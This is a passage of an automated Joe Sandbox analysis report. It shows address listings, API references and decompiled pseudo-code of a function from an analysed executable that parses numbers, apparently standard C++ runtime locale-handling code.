0x00000000
0x00000000
0x00000000
0x00000000
0x0043a456
0x0043a3ad
0x0043a3b0
0x0043a3b4
0x0043a3b4
0x0043a3bd
0x0043a3c4
0x0043a3c8
0x0043a3cc
0x0043a3cc
0x0043a3d1
0x0043a3d5
0x00000000
0x0043a3d7
0x0043a3d7
0x00000000
0x0043a3d7
0x0043a3bf
0x0043a3bf
0x0043a3da
0x0043a3dd
0x0043a3e0
0x00000000
0x0043a3e0
0x0043a3bd

APIs

__EH_prolog3_GS.LIBCMT ref: 0043A344

Part of subcall function 004013A0: std::_Lockit::_Lockit.LIBCPMT ref: 004013BC

Part of subcall function 004046B0: std::_Lockit::_Lockit.LIBCPMT ref: 004046DC
Part of subcall function 004046B0: std::_Lockit::_Lockit.LIBCPMT ref: 00404702

Part of subcall function 004012D0: std::_Lockit::_Lockit.LIBCPMT ref: 004012DE

_localeconv.LIBCMT ref: 0043A6EB

Strings

$, xrefs: 0043A779

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$H_prolog3__localeconv
String ID: $
API String ID: 3249881636-3993045852
Opcode ID: 260e4f151b9af6a87143327163f59c6f02c49951c8260c98266c1459d67d5e89
Instruction ID: 659f6e7b03e9f8a759791b11ab18b5d42c18bf0e3ac2b9d1027cb711910be24c
Opcode Fuzzy Hash: 260e4f151b9af6a87143327163f59c6f02c49951c8260c98266c1459d67d5e89
Instruction Fuzzy Hash: 1912C530E447849EEF26EBA484557AEBBB16F19304F08604FD4D22B382C7AC5D66C75B

Uniqueness

Uniqueness Score: -1.00%

Function 0043AF89 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 488
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0043AF89(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _t209;
				intOrPtr _t210;
				char _t214;
				char* _t215;
				char _t216;
				char _t217;
				char _t218;
				char* _t219;
				char _t223;
				char _t226;
				char _t227;
				char _t228;
				char _t236;
				char _t246;
				char _t251;
				intOrPtr* _t257;
				char _t265;
				intOrPtr* _t270;
				char _t274;
				intOrPtr _t276;
				intOrPtr* _t277;
				intOrPtr _t278;
				intOrPtr _t279;
				char _t283;
				intOrPtr _t285;
				intOrPtr _t286;
				intOrPtr _t298;
				intOrPtr _t350;
				intOrPtr* _t364;
				intOrPtr _t366;
				intOrPtr _t370;
				void* _t371;

				_push(0x60);
				E00425719(E0044F627, __ebx, __edi, __esi);
				_t298 =  *((intOrPtr*)(_t371 + 0x18));
				_t297 =  *((intOrPtr*)(_t371 + 0xc));
				_t370 =  *((intOrPtr*)(_t371 + 0x10));
				_t366 =  *((intOrPtr*)(_t371 + 0x1c));
				 *((intOrPtr*)(_t371 - 0x60)) =  *((intOrPtr*)(_t371 + 0x14));
				 *((intOrPtr*)(_t371 - 0x68)) = _t297;
				_t375 = ( *(_t298 + 0x14) & 0x00003000) - 0x3000;
				if(( *(_t298 + 0x14) & 0x00003000) != 0x3000) {
					_t209 = E004013A0(_t371 - 0x6c);
					 *(_t371 - 4) =  *(_t371 - 4) & 0x00000000;
					_t210 = E004046B0(_t209);
					 *(_t371 - 4) =  *(_t371 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t371 - 0x64)) = _t210;
					E004012D0();
					E00403840(_t371 - 0x48);
					 *(_t371 - 4) = 1;
					 *((intOrPtr*)(_t371 - 0x50)) = _t297;
					 *((char*)(_t371 - 0x51)) = 0;
					_t214 = E00439B42(_t370,  *((intOrPtr*)(_t371 - 0x60)));
					__eflags = _t214;
					if(_t214 != 0) {
						L12:
						_t215 =  *((intOrPtr*)(_t371 - 0x48));
						__eflags =  *((intOrPtr*)(_t371 - 0x34)) - 0x10;
						 *((char*)(_t371 - 0x49)) = 0;
						 *((intOrPtr*)(_t371 - 0x58)) = 0;
						 *((intOrPtr*)(_t371 - 0x5c)) = 0;
						if( *((intOrPtr*)(_t371 - 0x34)) < 0x10) {
							_t215 = _t371 - 0x48;
						}
						__eflags =  *_t215 - 0x7f;
						if( *_t215 == 0x7f) {
							L75:
							_t216 = E00439B42(_t370,  *((intOrPtr*)(_t371 - 0x60)));
							__eflags = _t216;
							if(_t216 != 0) {
								L95:
								_t217 = E00439B42(_t370,  *((intOrPtr*)(_t371 - 0x60)));
								__eflags = _t217;
								if(_t217 == 0) {
									__eflags =  *((intOrPtr*)(_t370 + 4)) - _t217;
									if( *((intOrPtr*)(_t370 + 4)) == _t217) {
										E00439B1C(_t370);
									}
									_t297 =  *((intOrPtr*)(_t370 + 5));
									__eflags =  *((intOrPtr*)(_t370 + 5)) -  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t371 - 0x64)))) + 4))();
									if(__eflags == 0) {
										_t257 = E004230FE(_t297, 1, _t370, __eflags);
										_t137 = _t371 - 0x50;
										 *_t137 =  *((intOrPtr*)(_t371 - 0x50)) + 1;
										__eflags =  *_t137;
										 *((char*)( *((intOrPtr*)(_t371 - 0x50)))) =  *((intOrPtr*)( *_t257));
										E00439AF8(_t370);
									}
								}
								__eflags =  *((intOrPtr*)(_t371 - 0x58));
								_t366 =  *((intOrPtr*)(_t371 - 0x60));
								if( *((intOrPtr*)(_t371 - 0x58)) != 0) {
									L109:
									_t218 = E00439B42(_t370, _t366);
									__eflags = _t218;
									if(_t218 != 0) {
										L122:
										__eflags =  *((char*)(_t371 - 0x49));
										if( *((char*)(_t371 - 0x49)) == 0) {
											L159:
											__eflags =  *((char*)(_t371 - 0x51));
											if( *((char*)(_t371 - 0x51)) != 0) {
												L161:
												_t219 =  *((intOrPtr*)(_t371 - 0x68));
												L163:
												 *_t219 = 0;
												E00402E20(_t371 - 0x48, 1, 0);
												goto L164;
											}
											__eflags =  *((char*)(_t371 - 0x49));
											if( *((char*)(_t371 - 0x49)) != 0) {
												_t219 =  *((intOrPtr*)(_t371 - 0x50));
												goto L163;
											}
											goto L161;
										}
										_t223 = E00439B42(_t370, _t366);
										__eflags = _t223;
										if(_t223 != 0) {
											goto L159;
										}
										__eflags =  *((intOrPtr*)(_t370 + 4)) - _t223;
										if( *((intOrPtr*)(_t370 + 4)) == _t223) {
											E00439B1C(_t370);
										}
										__eflags =  *((char*)(_t370 + 5)) - 0x65;
										if( *((char*)(_t370 + 5)) == 0x65) {
											L130:
											 *((intOrPtr*)(_t371 - 0x50)) =  *((intOrPtr*)(_t371 - 0x50)) + 1;
											 *((char*)( *((intOrPtr*)(_t371 - 0x50)))) = 0x65;
											E00439AF8(_t370);
											 *((char*)(_t371 - 0x49)) = 0;
											_t297 = 0;
											_t226 = E00439B42(_t370, _t366);
											__eflags = _t226;
											if(_t226 != 0) {
												L140:
												_t227 = E00439B42(_t370, _t366);
												__eflags = _t227;
												if(_t227 != 0) {
													while(1) {
														L158:
														_t228 = E00439B42(_t370, _t366);
														__eflags = _t228;
														if(_t228 != 0) {
															goto L159;
														}
														__eflags =  *((char*)(_t370 + 4));
														if( *((char*)(_t370 + 4)) == 0) {
															E00439B1C(_t370);
														}
														__eflags =  *((char*)(_t370 + 5)) - 0x30;
														if( *((char*)(_t370 + 5)) < 0x30) {
															goto L159;
														} else {
															__eflags =  *((char*)(_t370 + 4));
															if( *((char*)(_t370 + 4)) == 0) {
																E00439B1C(_t370);
															}
															__eflags =  *((char*)(_t370 + 5)) - 0x39;
															if( *((char*)(_t370 + 5)) > 0x39) {
																goto L159;
															} else {
																__eflags = _t297 - 8;
																if(_t297 < 8) {
																	__eflags =  *((char*)(_t370 + 4));
																	if( *((char*)(_t370 + 4)) == 0) {
																		E00439B1C(_t370);
																	}
																	 *((intOrPtr*)(_t371 - 0x50)) =  *((intOrPtr*)(_t371 - 0x50)) + 1;
																	 *((char*)( *((intOrPtr*)(_t371 - 0x50)))) =  *((intOrPtr*)(_t370 + 5));
																	_t297 = _t297 + 1;
																	__eflags = _t297;
																}
																 *((char*)(_t371 - 0x49)) = 1;
																E00439AF8(_t370);
																continue;
															}
														}
													}
													goto L159;
												} else {
													goto L141;
												}
												while(1) {
													L141:
													__eflags =  *((intOrPtr*)(_t370 + 4)) - _t297;
													if( *((intOrPtr*)(_t370 + 4)) == _t297) {
														E00439B1C(_t370);
													}
													__eflags =  *((char*)(_t370 + 5)) - 0x30;
													if( *((char*)(_t370 + 5)) != 0x30) {
														break;
													}
													 *((char*)(_t371 - 0x49)) = 1;
													E00439AF8(_t370);
													_t236 = E00439B42(_t370, _t366);
													__eflags = _t236;
													if(_t236 == 0) {
														continue;
													}
													break;
												}
												__eflags =  *((intOrPtr*)(_t371 - 0x49)) - _t297;
												if( *((intOrPtr*)(_t371 - 0x49)) != _t297) {
													 *((intOrPtr*)(_t371 - 0x50)) =  *((intOrPtr*)(_t371 - 0x50)) + 1;
													 *((char*)( *((intOrPtr*)(_t371 - 0x50)))) = 0x30;
												}
												goto L158;
											}
											__eflags =  *((intOrPtr*)(_t370 + 4));
											if( *((intOrPtr*)(_t370 + 4)) == 0) {
												E00439B1C(_t370);
											}
											__eflags =  *((char*)(_t370 + 5)) - 0x2b;
											if( *((char*)(_t370 + 5)) != 0x2b) {
												__eflags =  *((intOrPtr*)(_t370 + 4)) - _t297;
												if( *((intOrPtr*)(_t370 + 4)) == _t297) {
													E00439B1C(_t370);
												}
												__eflags =  *((char*)(_t370 + 5)) - 0x2d;
												if( *((char*)(_t370 + 5)) != 0x2d) {
													goto L140;
												} else {
													 *((char*)( *((intOrPtr*)(_t371 - 0x50)))) = 0x2d;
													goto L139;
												}
											} else {
												 *((char*)( *((intOrPtr*)(_t371 - 0x50)))) = 0x2b;
												L139:
												_t178 = _t371 - 0x50;
												 *_t178 =  *((intOrPtr*)(_t371 - 0x50)) + 1;
												__eflags =  *_t178;
												E00439AF8(_t370);
												goto L140;
											}
										} else {
											__eflags =  *((char*)(_t370 + 4));
											if( *((char*)(_t370 + 4)) == 0) {
												E00439B1C(_t370);
											}
											__eflags =  *((char*)(_t370 + 5)) - 0x45;
											if( *((char*)(_t370 + 5)) != 0x45) {
												goto L159;
											} else {
												goto L130;
											}
										}
									}
									_t297 =  *((intOrPtr*)(_t371 - 0x58));
									while(1) {
										__eflags =  *((char*)(_t370 + 4));
										if( *((char*)(_t370 + 4)) == 0) {
											E00439B1C(_t370);
										}
										__eflags =  *((char*)(_t370 + 5)) - 0x30;
										if( *((char*)(_t370 + 5)) < 0x30) {
											goto L122;
										}
										__eflags =  *((char*)(_t370 + 4));
										if( *((char*)(_t370 + 4)) == 0) {
											E00439B1C(_t370);
										}
										__eflags =  *((char*)(_t370 + 5)) - 0x39;
										if( *((char*)(_t370 + 5)) > 0x39) {
											goto L122;
										} else {
											__eflags = _t297 - 0x24;
											if(_t297 < 0x24) {
												__eflags =  *((char*)(_t370 + 4));
												if( *((char*)(_t370 + 4)) == 0) {
													E00439B1C(_t370);
												}
												 *((intOrPtr*)(_t371 - 0x50)) =  *((intOrPtr*)(_t371 - 0x50)) + 1;
												 *((char*)( *((intOrPtr*)(_t371 - 0x50)))) =  *((intOrPtr*)(_t370 + 5));
												_t297 = _t297 + 1;
												__eflags = _t297;
											}
											 *((char*)(_t371 - 0x49)) = 1;
											E00439AF8(_t370);
											_t246 = E00439B42(_t370, _t366);
											__eflags = _t246;
											if(_t246 == 0) {
												continue;
											} else {
												goto L122;
											}
										}
									}
									goto L122;
								} else {
									while(1) {
										_t251 = E00439B42(_t370, _t366);
										__eflags = _t251;
										if(_t251 != 0) {
											break;
										}
										__eflags =  *((char*)(_t370 + 4));
										if( *((char*)(_t370 + 4)) == 0) {
											E00439B1C(_t370);
										}
										__eflags =  *((char*)(_t370 + 5)) - 0x30;
										if( *((char*)(_t370 + 5)) != 0x30) {
											break;
										} else {
											_t143 = _t371 - 0x5c;
											 *_t143 =  *((intOrPtr*)(_t371 - 0x5c)) - 1;
											__eflags =  *_t143;
											 *((char*)(_t371 - 0x49)) = 1;
											E00439AF8(_t370);
											continue;
										}
									}
									__eflags =  *((intOrPtr*)(_t371 - 0x5c));
									if( *((intOrPtr*)(_t371 - 0x5c)) < 0) {
										 *((intOrPtr*)(_t371 - 0x50)) =  *((intOrPtr*)(_t371 - 0x50)) + 1;
										_t150 = _t371 - 0x5c;
										 *_t150 =  *((intOrPtr*)(_t371 - 0x5c)) + 1;
										__eflags =  *_t150;
										 *((char*)( *((intOrPtr*)(_t371 - 0x50)))) = 0x30;
									}
									goto L109;
								}
							} else {
								goto L76;
							}
							while(1) {
								L76:
								__eflags =  *((char*)(_t370 + 4));
								if( *((char*)(_t370 + 4)) == 0) {
									E00439B1C(_t370);
								}
								__eflags =  *((char*)(_t370 + 5)) - 0x30;
								if( *((char*)(_t370 + 5)) < 0x30) {
									break;
								}
								__eflags =  *((char*)(_t370 + 4));
								if( *((char*)(_t370 + 4)) == 0) {
									E00439B1C(_t370);
								}
								__eflags =  *((char*)(_t370 + 5)) - 0x39;
								if( *((char*)(_t370 + 5)) > 0x39) {
									break;
								} else {
									__eflags =  *((intOrPtr*)(_t371 - 0x58)) - 0x24;
									if( *((intOrPtr*)(_t371 - 0x58)) < 0x24) {
										__eflags =  *((char*)(_t370 + 4));
										if( *((char*)(_t370 + 4)) == 0) {
											E00439B1C(_t370);
										}
										__eflags =  *((char*)(_t370 + 5)) - 0x30;
										if( *((char*)(_t370 + 5)) != 0x30) {
											L88:
											__eflags =  *((char*)(_t370 + 4));
											if( *((char*)(_t370 + 4)) == 0) {
												E00439B1C(_t370);
											}
											 *((intOrPtr*)(_t371 - 0x50)) =  *((intOrPtr*)(_t371 - 0x50)) + 1;
											_t122 = _t371 - 0x58;
											 *_t122 =  *((intOrPtr*)(_t371 - 0x58)) + 1;
											__eflags =  *_t122;
											 *((char*)( *((intOrPtr*)(_t371 - 0x50)))) =  *((intOrPtr*)(_t370 + 5));
											goto L91;
										} else {
											__eflags =  *((intOrPtr*)(_t371 - 0x58));
											if( *((intOrPtr*)(_t371 - 0x58)) == 0) {
												L91:
												 *((char*)(_t371 - 0x49)) = 1;
												E00439AF8(_t370);
												_t265 = E00439B42(_t370,  *((intOrPtr*)(_t371 - 0x60)));
												__eflags = _t265;
												if(_t265 == 0) {
													continue;
												}
												break;
											}
											goto L88;
										}
									}
									 *((intOrPtr*)(_t371 - 0x5c)) =  *((intOrPtr*)(_t371 - 0x5c)) + 1;
									goto L91;
								}
							}
							L92:
							__eflags =  *((char*)(_t371 - 0x49));
							if( *((char*)(_t371 - 0x49)) != 0) {
								__eflags =  *((intOrPtr*)(_t371 - 0x58));
								if( *((intOrPtr*)(_t371 - 0x58)) == 0) {
									_t129 = _t371 - 0x50;
									 *_t129 =  *((intOrPtr*)(_t371 - 0x50)) + 1;
									__eflags =  *_t129;
									 *((char*)( *((intOrPtr*)(_t371 - 0x50)))) = 0x30;
								}
							}
							goto L95;
						}
						__eflags =  *((intOrPtr*)(_t371 - 0x34)) - 0x10;
						_t270 =  *((intOrPtr*)(_t371 - 0x48));
						if( *((intOrPtr*)(_t371 - 0x34)) < 0x10) {
							_t270 = _t371 - 0x48;
						}
						__eflags =  *_t270;
						if( *_t270 <= 0) {
							goto L75;
						} else {
							__eflags =  *((intOrPtr*)(_t371 - 0x38));
							if( *((intOrPtr*)(_t371 - 0x38)) != 0) {
								 *((char*)(_t371 - 0x52)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t371 - 0x64)))) + 8))();
							} else {
								 *((char*)(_t371 - 0x52)) = 0;
							}
							_t297 = 0;
							 *((intOrPtr*)(_t371 - 0x18)) = 0xf;
							 *((intOrPtr*)(_t371 - 0x1c)) = 0;
							 *((char*)(_t371 - 0x2c)) = 0;
							E0040BFB0(_t371 - 0x2c, 1, 0);
							 *(_t371 - 4) = 2;
							_t274 = E00439B42(_t370,  *((intOrPtr*)(_t371 - 0x60)));
							__eflags = _t274;
							if(_t274 != 0) {
								L58:
								__eflags =  *((intOrPtr*)(_t371 - 0x34)) - 0x10;
								_t364 =  *((intOrPtr*)(_t371 - 0x48));
								if( *((intOrPtr*)(_t371 - 0x34)) < 0x10) {
									_t364 = _t371 - 0x48;
								}
								__eflags =  *((char*)(_t371 - 0x51));
								if( *((char*)(_t371 - 0x51)) != 0) {
									L74:
									 *(_t371 - 4) = 1;
									E00402E20(_t371 - 0x2c, 1, 0);
									goto L92;
								} else {
									while(1) {
										__eflags = _t297;
										if(_t297 == 0) {
											goto L74;
										}
										_t350 =  *_t364;
										__eflags = _t350 - 0x7f;
										if(_t350 == 0x7f) {
											goto L74;
										}
										_t297 = _t297 - 1;
										__eflags = _t297;
										if(_t297 == 0) {
											L67:
											__eflags = _t297;
											if(_t297 != 0) {
												L71:
												__eflags =  *((char*)(_t364 + 1));
												if( *((char*)(_t364 + 1)) > 0) {
													_t364 = _t364 + 1;
												}
												continue;
											}
											__eflags =  *((intOrPtr*)(_t371 - 0x18)) - 0x10;
											_t277 =  *((intOrPtr*)(_t371 - 0x2c));
											if( *((intOrPtr*)(_t371 - 0x18)) < 0x10) {
												_t277 = _t371 - 0x2c;
											}
											__eflags = _t350 -  *_t277;
											if(_t350 <  *_t277) {
												L73:
												 *((char*)(_t371 - 0x51)) = 1;
												goto L74;
											} else {
												goto L71;
											}
										}
										__eflags =  *((intOrPtr*)(_t371 - 0x18)) - 0x10;
										_t276 =  *((intOrPtr*)(_t371 - 0x2c));
										if( *((intOrPtr*)(_t371 - 0x18)) < 0x10) {
											_t276 = _t371 - 0x2c;
										}
										__eflags = _t350 -  *((intOrPtr*)(_t276 + _t297));
										if(_t350 !=  *((intOrPtr*)(_t276 + _t297))) {
											goto L73;
										} else {
											goto L67;
										}
									}
									goto L74;
								}
							} else {
								do {
									__eflags =  *((char*)(_t370 + 4));
									if( *((char*)(_t370 + 4)) == 0) {
										E00439B1C(_t370);
									}
									__eflags =  *((char*)(_t370 + 5)) - 0x30;
									if( *((char*)(_t370 + 5)) < 0x30) {
										L43:
										__eflags =  *((intOrPtr*)(_t371 - 0x18)) - 0x10;
										_t278 =  *((intOrPtr*)(_t371 - 0x2c));
										if( *((intOrPtr*)(_t371 - 0x18)) < 0x10) {
											_t278 = _t371 - 0x2c;
										}
										__eflags =  *((char*)(_t278 + _t297));
										if( *((char*)(_t278 + _t297)) == 0) {
											break;
										} else {
											__eflags =  *((char*)(_t371 - 0x52));
											if( *((char*)(_t371 - 0x52)) == 0) {
												break;
											}
											__eflags =  *((char*)(_t370 + 4));
											if( *((char*)(_t370 + 4)) == 0) {
												E00439B1C(_t370);
											}
											__eflags =  *((intOrPtr*)(_t370 + 5)) -  *((intOrPtr*)(_t371 - 0x52));
											if( *((intOrPtr*)(_t370 + 5)) !=  *((intOrPtr*)(_t371 - 0x52))) {
												break;
											} else {
												E00403B10(_t371 - 0x2c, 1, 0);
												_t297 = _t297 + 1;
												__eflags = _t297;
												goto L51;
											}
										}
									} else {
										__eflags =  *((char*)(_t370 + 4));
										if( *((char*)(_t370 + 4)) == 0) {
											E00439B1C(_t370);
										}
										__eflags =  *((char*)(_t370 + 5)) - 0x39;
										if( *((char*)(_t370 + 5)) > 0x39) {
											goto L43;
										} else {
											__eflags =  *((intOrPtr*)(_t371 - 0x58)) - 0x24;
											 *((char*)(_t371 - 0x49)) = 1;
											if( *((intOrPtr*)(_t371 - 0x58)) < 0x24) {
												__eflags =  *((char*)(_t370 + 4));
												if( *((char*)(_t370 + 4)) == 0) {
													E00439B1C(_t370);
												}
												__eflags =  *((char*)(_t370 + 5)) - 0x30;
												if( *((char*)(_t370 + 5)) != 0x30) {
													L34:
													__eflags =  *((char*)(_t370 + 4));
													if( *((char*)(_t370 + 4)) == 0) {
														E00439B1C(_t370);
													}
													 *((intOrPtr*)(_t371 - 0x50)) =  *((intOrPtr*)(_t371 - 0x50)) + 1;
													_t65 = _t371 - 0x58;
													 *_t65 =  *((intOrPtr*)(_t371 - 0x58)) + 1;
													__eflags =  *_t65;
													 *((char*)( *((intOrPtr*)(_t371 - 0x50)))) =  *((intOrPtr*)(_t370 + 5));
													goto L37;
												} else {
													__eflags =  *((intOrPtr*)(_t371 - 0x58));
													if( *((intOrPtr*)(_t371 - 0x58)) == 0) {
														L37:
														__eflags =  *((intOrPtr*)(_t371 - 0x18)) - 0x10;
														_t285 =  *((intOrPtr*)(_t371 - 0x2c));
														if( *((intOrPtr*)(_t371 - 0x18)) < 0x10) {
															_t285 = _t371 - 0x2c;
														}
														__eflags =  *((char*)(_t285 + _t297)) - 0x7f;
														if( *((char*)(_t285 + _t297)) != 0x7f) {
															__eflags =  *((intOrPtr*)(_t371 - 0x18)) - 0x10;
															_t286 =  *((intOrPtr*)(_t371 - 0x2c));
															if( *((intOrPtr*)(_t371 - 0x18)) < 0x10) {
																_t286 = _t371 - 0x2c;
															}
															 *((char*)(_t286 + _t297)) =  *((char*)(_t286 + _t297)) + 1;
														}
														goto L51;
													}
													goto L34;
												}
											}
											 *((intOrPtr*)(_t371 - 0x5c)) =  *((intOrPtr*)(_t371 - 0x5c)) + 1;
											goto L37;
										}
									}
									L51:
									E00439AF8(_t370);
									_t283 = E00439B42(_t370,  *((intOrPtr*)(_t371 - 0x60)));
									__eflags = _t283;
								} while (_t283 == 0);
								__eflags = _t297;
								if(_t297 != 0) {
									__eflags =  *((intOrPtr*)(_t371 - 0x18)) - 0x10;
									_t279 =  *((intOrPtr*)(_t371 - 0x2c));
									if( *((intOrPtr*)(_t371 - 0x18)) < 0x10) {
										_t279 = _t371 - 0x2c;
									}
									__eflags =  *((char*)(_t279 + _t297));
									if( *((char*)(_t279 + _t297)) <= 0) {
										 *((char*)(_t371 - 0x51)) = 1;
									} else {
										_t297 = _t297 + 1;
									}
								}
								goto L58;
							}
						}
					} else {
						__eflags =  *((intOrPtr*)(_t370 + 4)) - _t214;
						if( *((intOrPtr*)(_t370 + 4)) == _t214) {
							E00439B1C(_t370);
						}
						__eflags =  *((char*)(_t370 + 5)) - 0x2b;
						if( *((char*)(_t370 + 5)) != 0x2b) {
							__eflags =  *((char*)(_t370 + 4));
							if( *((char*)(_t370 + 4)) == 0) {
								E00439B1C(_t370);
							}
							__eflags =  *((char*)(_t370 + 5)) - 0x2d;
							if( *((char*)(_t370 + 5)) != 0x2d) {
								goto L12;
							} else {
								 *_t297 = 0x2d;
								goto L11;
							}
						} else {
							 *_t297 = 0x2b;
							L11:
							_t297 = _t297 + 1;
							__eflags = _t297;
							 *((intOrPtr*)(_t371 - 0x50)) = _t297;
							E00439AF8(_t370);
							goto L12;
						}
					}
				} else {
					_push(_t366);
					_push(_t298);
					_push( *((intOrPtr*)(_t371 - 0x60)));
					_push(_t370);
					_push(_t297);
					_push( *((intOrPtr*)(_t371 + 8)));
					E0043A33D(_t297, _t366, _t370, _t375);
					L164:
					return E00425763(_t297, _t366, _t370);
				}
			}

0x0043af89
0x0043af90
0x0043af98
0x0043af9b
0x0043af9e
0x0043afa1
0x0043afa4
0x0043afb1
0x0043afb4
0x0043afb6
0x0043afd3
0x0043afd8
0x0043afdd
0x0043afe2
0x0043afea
0x0043afed
0x0043aff9
0x0043b006
0x0043b009
0x0043b00c
0x0043b010
0x0043b015
0x0043b017
0x0043b051
0x0043b051
0x0043b056
0x0043b05a
0x0043b05e
0x0043b061
0x0043b064
0x0043b066
0x0043b066
0x0043b069
0x0043b06c
0x0043b22b
0x0043b230
0x0043b235
0x0043b237
0x0043b2d0
0x0043b2d5
0x0043b2da
0x0043b2dc
0x0043b2de
0x0043b2e1
0x0043b2e5
0x0043b2e5
0x0043b2ef
0x0043b2f5
0x0043b2f7
0x0043b2f9
0x0043b305
0x0043b305
0x0043b305
0x0043b308
0x0043b30c
0x0043b30c
0x0043b2f7
0x0043b311
0x0043b315
0x0043b318
0x0043b35b
0x0043b35e
0x0043b363
0x0043b365
0x0043b3c5
0x0043b3c5
0x0043b3c9
0x0043b50a
0x0043b50a
0x0043b50e
0x0043b516
0x0043b516
0x0043b51e
0x0043b525
0x0043b528
0x00000000
0x0043b52d
0x0043b510
0x0043b514
0x0043b51b
0x00000000
0x0043b51b
0x00000000
0x0043b514
0x0043b3d2
0x0043b3d7
0x0043b3d9
0x00000000
0x00000000
0x0043b3df
0x0043b3e2
0x0043b3e6
0x0043b3e6
0x0043b3eb
0x0043b3ef
0x0043b408
0x0043b40b
0x0043b410
0x0043b413
0x0043b41b
0x0043b41f
0x0043b421
0x0043b426
0x0043b428
0x0043b466
0x0043b469
0x0043b46e
0x0043b470
0x0043b4fe
0x0043b4fe
0x0043b501
0x0043b506
0x0043b508
0x00000000
0x00000000
0x0043b4af
0x0043b4b3
0x0043b4b7
0x0043b4b7
0x0043b4bc
0x0043b4c0
0x00000000
0x0043b4c2
0x0043b4c2
0x0043b4c6
0x0043b4ca
0x0043b4ca
0x0043b4cf
0x0043b4d3
0x00000000
0x0043b4d5
0x0043b4d5
0x0043b4d8
0x0043b4da
0x0043b4de
0x0043b4e2
0x0043b4e2
0x0043b4ed
0x0043b4f0
0x0043b4f2
0x0043b4f2
0x0043b4f2
0x0043b4f5
0x0043b4f9
0x00000000
0x0043b4f9
0x0043b4d3
0x0043b4c0
0x00000000
0x00000000
0x00000000
0x00000000
0x0043b476
0x0043b476
0x0043b476
0x0043b479
0x0043b47d
0x0043b47d
0x0043b482
0x0043b486
0x00000000
0x00000000
0x0043b48a
0x0043b48e
0x0043b496
0x0043b49b
0x0043b49d
0x00000000
0x00000000
0x00000000
0x0043b49d
0x0043b49f
0x0043b4a2
0x0043b4a7
0x0043b4aa
0x0043b4aa
0x00000000
0x0043b4a2
0x0043b42a
0x0043b42d
0x0043b431
0x0043b431
0x0043b436
0x0043b43a
0x0043b444
0x0043b447
0x0043b44b
0x0043b44b
0x0043b450
0x0043b454
0x00000000
0x0043b456
0x0043b459
0x00000000
0x0043b459
0x0043b43c
0x0043b43f
0x0043b45c
0x0043b45c
0x0043b45c
0x0043b45c
0x0043b461
0x00000000
0x0043b461
0x0043b3f1
0x0043b3f1
0x0043b3f5
0x0043b3f9
0x0043b3f9
0x0043b3fe
0x0043b402
0x00000000
0x00000000
0x00000000
0x00000000
0x0043b402
0x0043b3ef
0x0043b367
0x0043b36a
0x0043b36a
0x0043b36e
0x0043b372
0x0043b372
0x0043b377
0x0043b37b
0x00000000
0x00000000
0x0043b37d
0x0043b381
0x0043b385
0x0043b385
0x0043b38a
0x0043b38e
0x00000000
0x0043b390
0x0043b390
0x0043b393
0x0043b395
0x0043b399
0x0043b39d
0x0043b39d
0x0043b3a8
0x0043b3ab
0x0043b3ad
0x0043b3ad
0x0043b3ad
0x0043b3b0
0x0043b3b4
0x0043b3bc
0x0043b3c1
0x0043b3c3
0x00000000
0x00000000
0x00000000
0x00000000
0x0043b3c3
0x0043b38e
0x00000000
0x0043b31a
0x0043b33d
0x0043b340
0x0043b345
0x0043b347
0x00000000
0x00000000
0x0043b31c
0x0043b320
0x0043b324
0x0043b324
0x0043b329
0x0043b32d
0x00000000
0x0043b32f
0x0043b32f
0x0043b32f
0x0043b32f
0x0043b334
0x0043b338
0x00000000
0x0043b338
0x0043b32d
0x0043b349
0x0043b34d
0x0043b352
0x0043b355
0x0043b355
0x0043b355
0x0043b358
0x0043b358
0x00000000
0x0043b34d
0x00000000
0x00000000
0x00000000
0x0043b23d
0x0043b23d
0x0043b23d
0x0043b241
0x0043b245
0x0043b245
0x0043b24a
0x0043b24e
0x00000000
0x00000000
0x0043b250
0x0043b254
0x0043b258
0x0043b258
0x0043b25d
0x0043b261
0x00000000
0x0043b263
0x0043b263
0x0043b267
0x0043b26e
0x0043b272
0x0043b276
0x0043b276
0x0043b27b
0x0043b27f
0x0043b287
0x0043b287
0x0043b28b
0x0043b28f
0x0043b28f
0x0043b29a
0x0043b29d
0x0043b29d
0x0043b29d
0x0043b2a0
0x00000000
0x0043b281
0x0043b281
0x0043b285
0x0043b2a2
0x0043b2a4
0x0043b2a8
0x0043b2b2
0x0043b2b7
0x0043b2b9
0x00000000
0x00000000
0x00000000
0x0043b2b9
0x00000000
0x0043b285
0x0043b27f
0x0043b269
0x00000000
0x0043b269
0x0043b261
0x0043b2bb
0x0043b2bb
0x0043b2bf
0x0043b2c1
0x0043b2c5
0x0043b2ca
0x0043b2ca
0x0043b2ca
0x0043b2cd
0x0043b2cd
0x0043b2c5
0x00000000
0x0043b2bf
0x0043b072
0x0043b076
0x0043b079
0x0043b07b
0x0043b07b
0x0043b07e
0x0043b080
0x00000000
0x0043b086
0x0043b086
0x0043b089
0x0043b098
0x0043b08b
0x0043b08b
0x0043b08b
0x0043b09b
0x0043b0a2
0x0043b0a9
0x0043b0ac
0x0043b0af
0x0043b0b9
0x0043b0bd
0x0043b0c2
0x0043b0c4
0x0043b1c5
0x0043b1c5
0x0043b1c9
0x0043b1cc
0x0043b1ce
0x0043b1ce
0x0043b1d1
0x0043b1d5
0x0043b217
0x0043b21d
0x0043b221
0x00000000
0x0043b1d7
0x0043b1d7
0x0043b1d7
0x0043b1d9
0x00000000
0x00000000
0x0043b1db
0x0043b1dd
0x0043b1e0
0x00000000
0x00000000
0x0043b1e2
0x0043b1e2
0x0043b1e3
0x0043b1f6
0x0043b1f6
0x0043b1f8
0x0043b20a
0x0043b20a
0x0043b20e
0x0043b210
